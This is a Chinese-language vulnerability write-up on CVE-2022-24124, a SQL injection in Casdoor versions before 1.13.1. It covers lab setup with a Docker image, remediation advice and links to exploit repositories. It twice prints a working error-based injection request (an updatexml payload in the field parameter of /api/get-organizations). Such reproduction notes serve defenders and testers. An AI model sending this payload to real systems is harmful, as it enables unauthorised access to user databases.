前言:Casdoor
![](https://img-blog.csdnimg.cn/0c4e14faacd5490b9c58208a45610230.png)
Casdoor 是一个基于 OAuth 2.0 / OIDC 的中心化的单点登录(SSO)身份验证平台,简单来说,就是 Casdoor可以帮你解决用户管理的难题,你无需开发用户登录、注册等与用户鉴权相关的一系列功能,只需几个步骤进行简单配置,与你的主应用配合,便可完全托管你的用户模块,简单省心,功能强大。Casdoor目前作为 Casbin 社区项目统一使用的鉴权平台,并且项目已开源。
编号
CVE编号:CVE-2022-24124
CNPD编号:CNPD-202201-7304
影响版本
危险等级:高 ( 7.5 HIGH )
POC/EXP:已公开
Casdoor < Casdoor 1.13.1 //1.13.1版本之前均受影响
漏洞简介
此漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
复现
1、搭建环境
拉取漏洞镜像
docker pull vulfocus/casdoor:1.13.0
启动漏洞环境
docker run -itd -p 8000:8000 -it -d vulfocus/casdoor:1.13.0
2、进行复现操作
打开漏洞环境页面
直接利用poc参数进行注入
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
解决方案
1、升级官方最新安全版本。
2、加强对用户输入信息进行验证和过滤,在具体检查输入或提交的变量时,对于括号、冒号等危险字符进行转换或者过滤。
漏洞验证工具POC
1、 直接利用POC:/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),3)
2、利用脚本https://github.com/ColdFusionX/CVE-2022-24124
相关信息:
https://nvd.nist.gov/vuln/detail/CVE-2022-24124
https://github.com/ColdFusionX/CVE-2022-24124
https://github.com/0xAbbarhSF/CVE-2022-24124